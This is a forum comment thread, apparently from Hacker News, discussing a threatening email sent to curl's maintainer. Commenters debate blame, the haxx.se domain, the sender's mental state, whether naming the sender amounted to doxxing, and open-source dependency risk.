cURL is a complex beast, it handles plenty of various network protocols, and does it in low-level c, therefore has a lot of potential for exploits if there is a bug like wrongly formatted strings, or buffer overflows. It's a nest for zero-days.
The code is available to anyone to look for such bugs, even the kids with ego problems (aka the hackers). Hackers like curl because it's a nice tool that indeed help them a lot.
Everyone uses curl, willingly or not, embedded by another library which needs some network protocol. Pass a filename that starts with "protocol://... " to any buggy program that will try to open it, and then one branch somewhere inside libcurl will get called. If you give the right magic string, you get a remote shell.
Why couldn't someone who doesn't want to use an open source library just write their own? Just because it exists doesn't mean you are forced to use it--
Most often it's a dependency of a dependency. The library you really want to use, is using the library you don't want to use. Economically it's not possible to not depend on anything, so you take some risk, and hope it doesn't later bites you back.
> You built a formula 1 race car and tossed the keys to kids with ego problems.
I laughed. Curl: The Formula 1 race car of command line tools!
Aside from that, I am surprised that the harasser followed up in a mostly non-violent way. I expected an absolute troll. Sadly in fact it seems the harasser is in need of psychiatric attention.
The person needs care and help and patient kindness. The person wants to resemble the late Terry Davies of Temple OS. The person isn't a serious threat from a sentence. The Internet is the threat. That's the fear.
Blaming Daniel for being for being hacked is like getting robbed and blames sneaker manufacturers because the robber happen to wear a pair of sneakers.
It's the domain of the contact email for curl. I think that is exactly what this person latched on to, given it was the first screenshot this person sent. Of course, Daniel is not to blame for people's uninformed reactions. But, one might point to this as a potential reason to avoid drawing the attention of the misinformed.
I think the elephant in the room is putting a personal email there in the first place. Honestly, you shouldn't act surprised you've received a threat, when you already know people constantly misunderstand that thing. In fact, it is quite literally like writing your phone number on a concrete block next to some dumpster in LA where all sorts of junkies constantly gather together, and then taking a personal offense when you receive a call from somebody who thinks this is Satan's phone number and he is the one who has been chosen to defeat you.
But, yeah, the domain itself obviously doesn't help the matter.
Delusions of grandeur, scapegoating, catastrophization, odd phrases, and lack of ownership.
Sounds like a mental health crisis or a sick joke. Either way, whoever was behind it didn't accomplish anything.
There can be situations where tools get inappropriately placed as critical infrastructure that are developed as hobbies by people with hobbyist-shrug attitudes, but this wouldn't be a constructive way to address it. Blame or personal attacks don't make improvements.
For other coming here who didn't immediately get the joke either. The kiddies attacking the sender were using curl to steal data, it wasn't an exploit in curl itself.
As per other advice, mental illness, best case is to ignore, the world is to big to help everyone online personally.
> JS Stochastic templating utilizing comparison expressions to write to data registers
This has zero meaning? I can't even guess what it might be?
> I lost over $15k in prototyping alone from bullshit rooting to the charge arbitrators.
"charge arbitrators" is not a thing. It's normally verb, noun. Not adjective, noun.
I'd almost go a nasty GPT-2/GPT-3. There's complexity but no links, this is 3 unrelated things - "Multiple Sigover attack vectors utilizing favicon XML injection"
Judging by what transpired and how the other person behaves, it sounds like he got what he deserved. Such a rotten personality shouldn't be allowed around people, let alone computers.
>As an open source maintainer since over twenty years, I know flame wars and personal attacks and I have a fairly thick skin and I don’t let words get to me easily. It took me a minute to absorb and realize it was actually meant as a direct physical threat. It found its ways through and got to me. This level of aggressiveness is not what I’m prepared for.
Posting this is just an open invitation for people to send you more threats.
Don’t want to delve into any accusatory territory, but I’ve seen several new accounts with names following a similar pattern that post such material and dip.
Not by choice. I'm usually auto-flagged/shadow-banned/banned after one or two comments, so I make a new account to join the discussion when necessary. I would prefer to use the same account but it's out of my hands.
The mod warned me that using a new name each time could be interpreted as deceptive so I've been using the same name (with an incremented suffix) for a little while now to not obscure my identity.
> I'm usually auto-flagged/shadow-banned/banned after one or two comments,
Maybe there is a reason? I had my comments downvoted, but thinking about this, it was deserved, those comments were really not constructive and severely lacking in empathy. No one normal likes reading such things and HN is a place where it matters. It's not a place to just vent.
No one 'normal' in my world would like most of the popular comments here (except to laugh at them). That's subjective.
I don't believe that I should be excluded from participating in good faith because of my race or political views. HN should be a place that welcomes diversity of thought, be it from a BLM activist or a White nationalist.
People are welcome to hit the disagree button. I don't care about that. I don't even mind much if I'm brash and the comment is flagged, as above.
I do care when my civil comments are flagged for wrongthink, and I do care when they are immediately censored. Then it's time for a new account.
Maybe it's now time to change your license to be more "unfree". Like adding contact or usage restrictions for psychopaths or warfarer. One does not need to deal with this.
I worked for a cryptocurrency project which was using my open source project as one of the main components and the price of that cryptocurrency dropped in price by about 99% from its peak... Thousands of anonymous people lost huge sums. I was a bit worried at times about blame potentially being misdirected towards me but it didn't happen, people were supportive in fact. Token price is back up high now.
Yes it is. And also, all the other times. This has nothing to do with any vulnerability in curl, just that someone might have used curl to script requests. You might as well attack the HTTP protocol.
The person saw some exploit with curl headers, which damaged their life. That's upsetting, even if the email is misdirected, because Daniel just provided the infrastructure, and did not cause the specific abuse. What is wrong is the threat to life.
The second thing that is wrong is to respond to the second email by doxxing the author to the public. The second email showed that the threat was likely not specific and immanent, but venting. A reasonable response would be to notify the police. Or to reveal this case to the public explaining why this is misdirected, but without the author's name.
I disagree with the idea that sharing a singular name of someone you had a conversion with is doxxing. Especially one voluntarily sent without a prior agreement that the email conversation would remain private.
I have nothing but respect for Daniel, but having a domain like haxx.se while being a maintainer of a general purpose powerful and popular(!) software tool is not smart.
This liability could've been mitigated to some degree by having a more innocuous sounding domain name. Having it as is, given enough time and thanks to the tremendous popularity of libcurl/curl someone somewhere is going to jump to conclusions that Daniel is responsible for making this "race car" hacking tool that script kiddies are now using to wreck his life.
Stalman has failed culturally, distance yourself from the "hacking" culture of the past if you care about your marketability and reputation.
I'm not sure whether this person is actually responsible for a multi-million dollar defense project, but if he really was, it's probably a good thing he lost the deal because I definitely don't want that kind of person managing such a project.